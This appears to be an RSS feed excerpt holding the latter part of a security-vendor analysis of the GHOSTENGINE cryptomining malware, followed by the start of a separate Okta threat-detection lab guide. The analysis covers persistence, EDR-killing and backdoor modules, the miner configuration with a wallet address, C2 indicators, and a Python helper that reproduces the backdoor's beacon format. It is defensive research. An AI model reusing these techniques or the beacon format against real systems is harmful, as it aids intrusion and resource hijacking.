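</code></pre>
<p>Decoding <code>0x7299C004</code> this way yields device type <code>0x7299</code> with <code>METHOD_BUFFERED</code>, consistent with a vendor-defined device rather than a standard Windows one.</p>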
<p><code>smartsscreen.exe</code> then downloads the XMRig client mining program and its driver from the C2 server (retrieved as <code>taskhostw.png</code> and <code>WinRing0x64.png</code>, respectively). Finally, it executes XMRig with its driver and the configuration file <code>config.json</code>, starting the mining process.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image19.png" alt="smartscreen.exe executing XMRig" title="smartscreen.exe executing XMRig" /></p>
<h4>Update/Persistence module: oci.dll</h4>
<p>The PowerShell script creates a service DLL (<code>oci.dll</code>), a phantom DLL loaded by <code>msdtc</code>. The DLL's architecture varies depending on the machine; it can be 32-bit or 64-bit. Its primary function is to maintain persistence and retrieve updates by downloading the <code>get.png</code> script from the C2 and executing it.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image3.png" alt="oci.dll persistence/update mechanism" title="oci.dll persistence/update mechanism" /></p>
<p>Every time the <code>msdtc</code> service starts, it will load <code>oci.dll</code> to spawn the PowerShell one-liner that executes <code>get.png</code>:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image23.png" alt="oci.dll downloading and executing get.png" title="oci.dll downloading and executing get.png" /></p>
<h4>EDR agent termination module: <code>kill.png</code></h4>
<p><code>kill.png</code> is a PowerShell script that injects shellcode into the current process, decrypting and loading a PE file into memory.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image24.png" alt="kill.png injecting shellcode" title="kill.png injecting shellcode" /></p>
<p>This module is written in C++, and the authors have built redundancy into its operation: it replicates the technique used in <code>smartsscreen.exe</code> to terminate and delete EDR agent binaries, continuously scanning for any newly created processes.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image7.png" alt="kill.png hardcoded security agent monitoring list" title="kill.png hardcoded security agent monitoring list" /></p>
<h4>PowerShell backdoor module: <code>backup.png</code></h4>
<p>The PowerShell script functions as a backdoor, enabling remote command execution on the system. It continually sends a Base64-encoded JSON object containing a unique ID, derived from the current time and the computer name, while awaiting Base64-encoded commands. The results of those commands are then sent back.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image18.png" alt="backup.png operating as a backdoor" title="backup.png operating as a backdoor" /></p>
<p>In this example <code>eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9</code> is the Base64-encoded JSON object:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image16.png" alt="C2 Communication example of backup.png" title="backup.png HTTP header information" /></p>
<pre><code>$ echo &quot;eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9&quot; | base64 -D
{&quot;id&quot;:&quot;171568624072626&quot;,&quot;host&quot;:&quot;analysis&quot;}
</code></pre>
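<p>The beacon format is easy to reproduce when building detections or test fixtures. In this Python sketch, the millisecond-epoch ID is an assumption based on the shape of the observed value; the sample derives its ID from the current time and the computer name:</p>
<pre><code class="language-python">import base64
import json
import socket
import time

def build_beacon(host=None):
    """Build a Base64-encoded JSON beacon like the one backup.png sends.
    The millisecond-epoch ID is an assumption for illustration."""
    payload = {
        "id": str(int(time.time() * 1000)),
        "host": host or socket.gethostname(),
    }
    return base64.b64encode(
        json.dumps(payload, separators=(",", ":")).encode()).decode()
</code></pre>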
<h2>Miner configuration</h2>
<p>XMRig is a legitimate crypto miner, and its configuration file usage and elements are documented <a href="https://xmrig.com/docs/miner/config">here</a>. As noted at the beginning of this publication, the ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig.</p>
<p>We extracted the configuration file from the miner, which was tremendously valuable as it allowed us to report on the Monero Payment ID and track the worker and pool statistics, mined cryptocurrency, transaction IDs, and withdrawals.</p>
<p>Below is an excerpt from the REF4578 XMRig configuration file:</p>
<pre><code>{
    &quot;autosave&quot;: false,
    &quot;background&quot;: true,
    &quot;colors&quot;: true,

...truncated...

    &quot;donate-level&quot;: 0,
    &quot;donate-over-proxy&quot;: 0,
    &quot;pools&quot;: [
        {
            &quot;algo&quot;: &quot;rx/0&quot;,
            &quot;coin&quot;: &quot;monero&quot;,
            &quot;url&quot;: &quot;pool.supportxmr[.]com:443&quot;,
            &quot;user&quot;: &quot;468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f&quot;,
            &quot;keepalive&quot;: true,
            &quot;tls&quot;: true

...truncated...

    &quot;user-agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36&quot;,
    &quot;verbose&quot;: 0,
    &quot;watch&quot;: true,
    &quot;pause-on-battery&quot;: false,
    &quot;pause-on-active&quot;: false
}
</code></pre>
<h3>Monero Payment ID</h3>
<p>Monero is a blockchain cryptocurrency focusing on obfuscation and fungibility to ensure anonymity and privacy. The <a href="https://www.getmonero.org/resources/moneropedia/paymentid.html">Payment ID</a> is an arbitrary and optional transaction attachment that consists of 32 bytes (64 hexadecimal characters) or 8 bytes (in the case of integrated addresses).</p>
<p>Using the Payment ID from the above configuration excerpt (<code>468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f</code>) we can view the worker and pool statistics on one of the <a href="https://monero.hashvault.pro/en/">Monero Mining Pool site</a>s listed in the configuration.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image22.png" alt="Worker and pool statistics of the REF4578 Payment ID" title="Worker and pool statistics of the REF4578 Payment ID" /></p>
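<p>As a side note, the 95-character value from the configuration's <code>user</code> field has the shape of a standard Monero primary address: 95 Base58 characters beginning with <code>4</code>. A loose format check in Python (this validates shape only, not the embedded checksum):</p>
<pre><code class="language-python"># Standard Base58 alphabet (no 0, O, I, or l), as used by Monero addresses.
B58_ALPHABET = frozenset(
    "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")

def looks_like_monero_address(s):
    """Loose shape check for a standard Monero primary address: 95 Base58
    characters starting with '4'. Does not verify the embedded checksum,
    so it can only rule candidates out, never confirm them."""
    return len(s) == 95 and s.startswith("4") and B58_ALPHABET.issuperset(s)
</code></pre>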
<p>Additionally, we can see the transaction hashes, which we can look up on the Monero blockchain explorer. Note that while transactions date back four months, this only indicates the <em>potential</em> monetary gain by this specific worker and account.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image2.png" alt="Payments for the REF4578 Payment ID" title="Payments for the REF4578 Payment ID" /></p>
<p>Using the Blockchain Explorer and one of the <a href="https://monero.hashvault.pro/explorer/prove/7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442/468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f/f1415e7710323cf769ce74d57ec9b7337d7a61b9ee4bba2ee38f9e8c3c067a005a484f8b9a14fb8964f56bb76181eafdb7dbb00677a155b067204423f23ab50ad146867795f560ad9443520f073f0bd71b8afd3259b24ae2a59aa7772f68fc028388f001bfeaa0f4ccc1f547b54924bb116352e9302424d731dc580dcccbb40749503640895d31559d7fc258b616576e7f052bbdbbc7083126f595c36015de02f6e95da8cfc81ee5fa1bd4d4c29bf55db96e4779924ab0d26993f7bf834ceb01fe314fd19e55c7304f91e809be3e29b68778f0da6dbcfe57d3eafc6dae5e090645d6b3753f44c4e1c1356b19d406c6efe7a55ec7c2b4997bd1fc65f15a4fda03619fc53beff111ddd9fd94f5ba3c503ccb73f52009bd3c1d47216b9a7c82d5065ac5e8a946e998cbc23fd8815a93cbbd655961709ac3ea8b1fd87e940e72370dc542ca4c22837e91ab5dd94d2c1c0a81e8ec9558766575ba236c3ae29b0f470fe881e22a03da405118a3353a5ecc618d1837e1a2bd449888a47a761efa98c407ce857fd389cdea63e9670edcf4b4d6c4c33e9c2851430270c8ef6dfb8cfeb9025ca7a17c9acdbfeb6670b3eabcbfde36cbc907e23fdd0c64aa2fc4103412a70c97838e177184c2f3d794e089b47ce66656d6c4cab2bbb4d6d71a3245f1dc360c7da9220eec90ef6e67cb13831b52ef14cf5bf1dd6adc202edc0892d9529145047786ed1042857f6986ed608839d595f06c1971f415f967d260d17ea8f5582400">transaction hashes</a> we got from the Payment ID, we can see the public key, the amount withdrawn, and when. Note that these public keys are used with one-time addresses, or stealth addresses, that the adversary would then use a private key with to unlock the funds.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image17.png" alt="Transactions for the REF4578 Payment ID" title="Transactions for the REF4578 Payment ID" /></p>
<p>In the above example for transaction <code>7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442</code>, we can see that there was a withdrawal of <code>0.109900000000</code> XMR (the abbreviation for Monero) totaling $14.86 USD. The Monero Mining Pool site shows four transactions of approximately the same amount of XMR, totaling approximately $60.70 USD (January - March 2024).</p>
<p>As of the publication of this research, there are still active miners connected to the REF4578 Payment ID.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image5.png" alt="Miners actively connecting to the REF4578 Payment ID" title="Miners actively connecting to the REF4578 Payment ID" /></p>
<p>While this specific Payment ID does not appear to be a big earner, it is evident that REF4578 could operate this intrusion set successfully. Other victims of this campaign could have different Payment IDs used to track intrusions, which could be combined for a larger overall haul.</p>
<h2>Malware and MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011">Command and Control</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0010/">Exfiltration</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0040/">Impact</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/003/">Command and Scripting Interpreter: Windows Command Shell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task</a></li>
<li><a href="https://attack.mitre.org/techniques/T1070/001/">Indicator Removal: Clear Windows Event Logs</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/">Masquerading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1057/">Process Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1041/">Exfiltration Over C2 Channel</a></li>
<li><a href="https://attack.mitre.org/techniques/T1132">Data Encoding</a></li>
<li><a href="https://attack.mitre.org/techniques/T1496/">Resource Hijacking</a></li>
<li><a href="https://attack.mitre.org/techniques/T1489/">Service Stop</a></li>
</ul>
<h2>Mitigating GHOSTENGINE</h2>
<h3>Detection</h3>
<p>The first objective of the GHOSTENGINE malware is to incapacitate endpoint security solutions and disable specific Windows event logs, such as the Security and System logs, which record process creation and service registration. Therefore, it is crucial to prioritize the detection and prevention of these initial actions:</p>
<ul>
<li>Suspicious PowerShell execution</li>
<li>Execution from unusual directories</li>
<li>Elevating privileges to system integrity</li>
<li>Deploying vulnerable drivers and establishing associated kernel mode services</li>
</ul>
<p>Once the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM.</p>
<p>Network traffic may be generated and identifiable when DNS lookups resolve <a href="https://miningpoolstats.stream/monero">known mining pool</a> domains, with traffic over well-known ports such as HTTP (<code>80</code>) and HTTPS (<code>443</code>). Stratum, another popular network protocol for miners, runs over port <code>4444</code> by default.</p>
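<p>That DNS signal can be expressed as a simple filter over ECS-style endpoint DNS events. The pool list below is a small illustrative subset (only <code>pool.supportxmr[.]com</code> appears in this sample's configuration); a production hunt should draw on a maintained pool list:</p>
<pre><code class="language-python"># Small illustrative subset of Monero pool domains; a real hunt should use
# a maintained list such as the one referenced above.
MINING_POOL_DOMAINS = {"pool.supportxmr.com", "monero.hashvault.pro"}

def flag_dns_events(events):
    """Return events whose queried name is, or is a subdomain of, a known
    mining pool domain. Events are dicts keyed like ECS fields."""
    def matches(name):
        name = name.rstrip(".").lower()
        return any(name == d or name.endswith("." + d)
                   for d in MINING_POOL_DOMAINS)
    return [e for e in events if matches(e.get("dns.question.name", ""))]
</code></pre>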
<p>The analysis of this intrusion set revealed the following detection rules and behavior prevention events:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_downloads.toml">Suspicious PowerShell Downloads</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/privilege_escalation_service_control_spawned_script_int.toml">Service Control Spawned via Script Interpreter</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/persistence_local_scheduled_task_creation.toml">Local Scheduled Task Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_from_unusual_directory.toml">Process Execution from an Unusual Directory</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41">Svchost spawning Cmd</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41">Unusual Parent-Child Relationship</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_clearing_windows_event_logs.toml">Clearing Windows Event Logs</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_microsoft_defender_tampering.toml">Microsoft Windows Defender Tampering</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml">Potential Privilege Escalation via Missing DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml#L58">Binary Masquerading via Untrusted Path</a></li>
</ul>
<h3>Prevention</h3>
<p>Malicious Files Prevention:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image1.png" alt="GHOSTENGINE file prevention" title="GHOSTENGINE file prevention" /></p>
<p>Shellcode Injection Prevention:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image14.png" alt="GHOSTENGINE shellcode prevention" title="GHOSTENGINE shellcode prevention" /></p>
<p>Vulnerable Driver File Creation Prevention (<a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar">Windows.VulnDriver.ArPot</a> and <a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar">Windows.VulnDriver.IoBitUnlocker</a>):</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image15.png" alt="GHOSTENGINE driver prevention" title="GHOSTENGINE driver prevention" /></p>
<h4>YARA</h4>
<p>Elastic Security has created YARA rules to identify this activity.</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostEngine.yar">Windows Trojan GHOSTENGINE</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar">Windows.VulnDriver.ArPot</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar">Windows.VulnDriver.IoBitUnlocker</a></li>
</ul>
<h2>Observations</h2>
<p>All observables are also available for <a href="https://github.com/elastic/labs-releases/tree/main/indicators/ghostengine">download</a> in both ECS and STIX format.</p>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th>Observable</th>
<th>Type</th>
<th>Name</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\smartsscreen.exe</code></td>
<td>GHOSTENGINE EDR controller module</td>
</tr>
<tr>
<td><code>4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\drivers\aswArPots.sys</code></td>
<td>Avast vulnerable driver</td>
</tr>
<tr>
<td><code>2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\drivers\IObitUnlockers.sys</code></td>
<td>IObit vulnerable driver</td>
</tr>
<tr>
<td><code>3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\oci.dll</code></td>
<td>Update/Persistence module (64-bit)</td>
</tr>
<tr>
<td><code>3b2724f3350cb5f017db361bd7aae49a8dbc6faa7506de6a4b8992ef3fd9d7ab</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\oci.dll</code></td>
<td>Update/Persistence module (32-bit)</td>
</tr>
<tr>
<td><code>35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\taskhostw.exe</code></td>
<td>Miner client</td>
</tr>
<tr>
<td><code>786591953336594473d171e269c3617d7449876993b508daa9b96eedc12ea1ca</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\config.json</code></td>
<td>Miner configuration file</td>
</tr>
<tr>
<td><code>11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\WinRing0x64.sys</code></td>
<td>Miner driver</td>
</tr>
<tr>
<td><code>aac7f8e174ba66d62620bd07613bac1947f996bb96b9627b42910a1db3d3e22b</code></td>
<td>SHA-256</td>
<td><code>C:\ProgramData\Microsoft\DeviceSync\SystemSync\Tiworker.exe</code></td>
<td>Initial stager</td>
</tr>
<tr>
<td><code>6f3e913c93887a58e64da5070d96dc34d3265f456034446be89167584a0b347e</code></td>
<td>SHA-256</td>
<td><code>backup.png</code></td>
<td>GHOSTENGINE backdoor module</td>
</tr>
<tr>
<td><code>7c242a08ee2dfd5da8a4c6bc86231985e2c26c7b9931ad0b3ea4723e49ceb1c1</code></td>
<td>SHA-256</td>
<td><code>get.png</code></td>
<td>GHOSTENGINE loader</td>
</tr>
<tr>
<td><code>cc4384510576131c126db3caca027c5d159d032d33ef90ef30db0daa2a0c4104</code></td>
<td>SHA-256</td>
<td><code>kill.png</code></td>
<td>GHOSTENGINE EDR termination module</td>
</tr>
<tr>
<td><code>download.yrnvtklot[.]com</code></td>
<td>domain</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>111.90.158[.]40</code></td>
<td>ipv4-addr</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>ftp.yrnvtklot[.]com</code></td>
<td>domain</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>93.95.225[.]137</code></td>
<td>ipv4-addr</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>online.yrnvtklot[.]com</code></td>
<td>domain</td>
<td></td>
<td>C2 server</td>
</tr>
</tbody>
</table>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://www.antiy.com/response/HideShoveling.html">https://www.antiy.com/response/HideShoveling.html</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/ghostengine.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Monitoring Okta threats with Elastic Security]]></title>
            <link>https://www.elastic.co/es/security-labs/monitoring-okta-threats-with-elastic-security</link>
            <guid>monitoring-okta-threats-with-elastic-security</guid>
            <pubDate>Fri, 23 Feb 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Welcome to another installment of Okta threat research with Elastic. <a href="https://www.elastic.co/es/security-labs/starter-guide-to-understanding-okta">Previously</a>, we have published articles exploring Okta’s core services and offerings. This article is dedicated to the practical side of cyber defense - setting up a robust Okta threat detection lab. Our journey will navigate through the intricacies of configuring a lab environment using the Elastic Stack, integrating SIEM solutions, and seamlessly connecting with Okta.</p>
<p>The goal of this article is not just to inform but to empower. Whether you're a seasoned cybersecurity professional or a curious enthusiast, our walkthrough aims to equip you with the knowledge and tools to understand and implement advanced threat detection mechanisms for Okta environments. We believe that hands-on experience is the cornerstone of effective cybersecurity practice, and this guide is crafted to provide you with a practical roadmap to enhance your security posture.</p>
<p>As we embark on this technical expedition, remember that the world of cybersecurity is dynamic and ever-evolving. The methods and strategies discussed here are a reflection of the current landscape and best practices. We encourage you to approach this guide with a mindset of exploration and adaptation, as the techniques and tools in cybersecurity are continually advancing.</p>
<p>So, let's dive into our detection lab setup for Okta research.</p>
<h2>Prerequisites</h2>
<p>For starters, an Okta license (a <a href="https://www.okta.com/free-trial/">trial license</a> is fine) is required for this lab setup. This will at least allow us to generate Okta system logs within our environment, which we can then ingest into our Elastic Stack.</p>
<p>Secondly, after Okta is set up, we can deploy a Windows Server, set up Active Directory (AD), and use the <a href="https://help.okta.com/en-us/content/topics/directory/ad-agent-main.htm">AD integration</a> in Okta to sync AD with Okta for Identity and Access Management (IAM). This step is not necessary for the rest of the lab; however, it can help extend our lab for other exercises and scenarios where endpoint and Okta data are both necessary for hunting.</p>
<h2>Sign up for Okta Workforce Identity</h2>
<p>We will set up a fresh Okta environment for this walkthrough by signing up for a Workforce Identity Cloud trial. If you already have an Okta setup in your environment, then feel free to skip to the <code>Setting up your free cloud stack</code> section.</p>
<p>Once signed up for the trial, you are typically presented with a URL containing a trial license subdomain and the email to log into the Okta admin console.</p>
<p>To start, pivot over to the email address you provided when signing up and follow the instructions in the activation email from Okta, which contains a QR code to scan.</p>
<p>The QR code links to the Okta Verify application, available for iOS and Android mobile devices. The device then prompts you to set up multi-factor authentication (MFA) using a phone number and face recognition.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image23.png" alt="Setting up Okta Verify through a mobile device" /></p>
<p><em>Image 1: Setting up Okta Verify through a mobile device</em></p>
<p>Once set up, we are redirected to the Okta admin console to configure MFA using Okta Verify.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image9.png" alt="The Okta Admin console" /></p>
<p><em>Image 2: The Okta Admin console</em></p>
<p>At this point, you should have a trial license for Okta, have set up MFA, and have access to the Okta admin console.</p>
<h2>Setting up your free cloud stack</h2>
<p>For this lab, we will use a <a href="https://cloud.elastic.co/registration">free trial</a> of an Elastic Cloud instance. You also have the option to create the stack in <a href="https://www.elastic.co/es/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&amp;utm_content=Elasticsearch-AWS&amp;utm_source=adwords-s&amp;utm_medium=paid&amp;device=c&amp;utm_term=amazon%20elk&amp;gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB">Amazon Web Services</a> (AWS), <a href="https://www.elastic.co/es/guide/en/cloud/current/ec-billing-gcp.html">GCP</a>, or Microsoft Azure if you’d like to set up your stack in an existing cloud service provider (CSP). Ensure you <a href="https://www.elastic.co/es/guide/en/cloud/current/ec-account-user-settings.html#ec-account-security-mfa">enable MFA for your Elastic Cloud environment</a>.</p>
<p>Once registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment <code>okta-threat-detection</code> and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version to get all the latest features. For the purposes of this demo, we use the following:</p>
<ul>
<li>Name: okta-threat-detection</li>
<li>Cloud provider: Google Cloud</li>
<li>Region: Iowa (us-central1)</li>
<li>Hardware profile: Storage optimized</li>
<li>Version: 8.12.0 (latest)</li>
</ul>
<p>The option to adjust additional settings for Elasticsearch, Kibana, Integrations, and more is configurable during this step. However, default settings are fine for this lab exercise. If you choose to leverage the Elastic Stack for a more permanent, long-term strategy, we recommend planning and designing architecturally according to your needs.</p>
<p>Once set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP (or whatever cloud provider you selected). You can download the displayed credentials as a CSV file or save them wherever you see fit. The deployment takes approximately 5 minutes to complete and once finished, you can select “Continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image14.png" alt="Your newly deployed Elastic stack" /></p>
<p><em>Image 3: Your newly deployed Elastic stack</em></p>
<h2>Set up Fleet from the Security Solution</h2>
<p>As a reminder, <a href="https://www.elastic.co/es/guide/en/fleet/current/fleet-overview.html">Fleet</a> enables the creation and management of an agent policy, which will incorporate the <a href="https://docs.elastic.co/en/integrations/okta">Okta integration</a> on an Elastic Agent. This integration is used to access and ingest Okta logs into our stack.</p>
<h3>Create an Okta policy</h3>
<p>For our Elastic Agent to know which integration it is using, what data to gather, and where to stream that data within our stack, we must first set up a custom Fleet policy we’re naming Okta.</p>
<p>To set up a Fleet policy, do the following in your Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Management &gt; Fleet &gt; Agent Policies &gt; Create agent policy</li>
<li>Enter “Okta” as a name &gt; Create Agent Policy</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image19.png" alt="Fleet agent policies page in Elastic Stack" /></p>
<p><em>Image 4: Fleet agent policies page in Elastic Stack</em></p>
<h2>Set up the Okta integration</h2>
<p>Once our policy is established, we need to install the Okta integration for the Elastic Stack we just deployed.</p>
<p>Select the “Okta” policy we just created, then add the Okta integration by selecting “Add integration” as shown below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image17.png" alt="The Okta integration within the agent policies" /></p>
<p><em>Image 5: The Okta integration within the agent policies</em></p>
<p>Typing “Okta” into the search bar will show the Okta integration that needs to be added. Select this integration and the following prompt should appear.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image22.png" alt="The Okta Integration page" /></p>
<p><em>Image 6: The Okta Integration page</em></p>
<p>By selecting “Add Okta” we can now set up the integration with a simple step-by-step process, similar to adding any other integration in the Elastic Stack.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image7.png" alt="Adding integrations into the Elastic Stack" /></p>
<p><em>Image 7: Adding integrations into the Elastic Stack</em></p>
<h2>Install the Elastic Agent on an endpoint</h2>
<p>As previously mentioned, we must install at least one Elastic Agent, enrolled in the configured Okta policy, on an endpoint to collect data from Okta. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP, to keep everything in the same environment. For this publication, I will use an <a href="https://releases.ubuntu.com/focal/">Ubuntu 20.04 LTS</a> VM instance in Google’s Compute Engine (GCE). Your endpoint can be lightweight, such as the GCP N1 or E2 series, as its sole purpose is to run the Elastic Agent.</p>
<p>Select the “Install Elastic Agent” button and select which host the agent will be installed on. For this example, we will be using a Linux host. Once selected, a “Copy” option is available to copy and paste the commands into your Linux console, followed by execution.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image24.png" alt="Install Elastic Agent" /></p>
